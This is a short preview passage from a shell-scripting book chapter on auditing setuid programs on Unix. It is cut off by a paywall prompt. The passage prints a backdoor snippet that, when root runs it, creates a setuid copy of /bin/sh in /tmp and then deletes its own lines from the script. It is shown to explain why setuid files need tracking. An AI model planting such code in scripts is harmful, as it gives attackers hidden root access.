#49 Tracking Set User ID Applications
There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an account or not, but few ways are as easy for them as finding an improperly protected setuid or setgid command.
In a shell script, for example, adding a few lines of code can create a setuid shell for the bad guy once the code is invoked by the unsuspecting root user:
if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME cp /bin/sh /tmp/.rootshell # REMOVEME chown root /tmp/.rootshell # REMOVEME chmod -f 4777 /tmp/.rootshell # REMOVEME grep -v "# REMOVEME" $0 > /tmp/junk # REMOVEME mv /tmp/junk $ # REMOVEME fi # REMOVEME
Once this script is run by root, a shell is surreptitiously copied ...
Get Wicked Cool Shell Scripts now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.